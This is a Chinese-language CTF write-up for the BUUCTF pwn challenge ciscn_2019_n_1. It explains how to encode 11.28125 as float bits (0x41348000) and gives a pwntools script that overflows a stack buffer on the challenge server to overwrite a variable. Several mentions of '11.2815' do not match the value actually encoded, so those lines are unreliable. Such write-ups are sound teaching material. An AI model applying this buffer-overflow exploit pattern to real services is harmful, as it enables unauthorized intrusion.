buuctf-pwn-1

本文最后更新于:2021年5月31日 下午

ciscn_2019_n_1

11.28125转为二进制

image-20201130202800389

显而易见,

我们需要去覆盖v2为11.2815,首先需要了解一下浮点数转16进制。

https://www.cnblogs.com/mlgjb/p/8318436.html

11.2815

11转为二进制

1011

0.2815求得二进制

01100010000000100000000

最后得

01000001001101001000000000000000 转为16进制 0x41348000

exp:

1
2
3
4
5
6
7
from pwn import *

io = remote("node3.buuoj.cn", 27962)

payload = b'A'*(0x30-4) + p64(0x41348000)
io.sendline(payload)
io.interactive()
CTF赛题writeup pwn
writeup

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!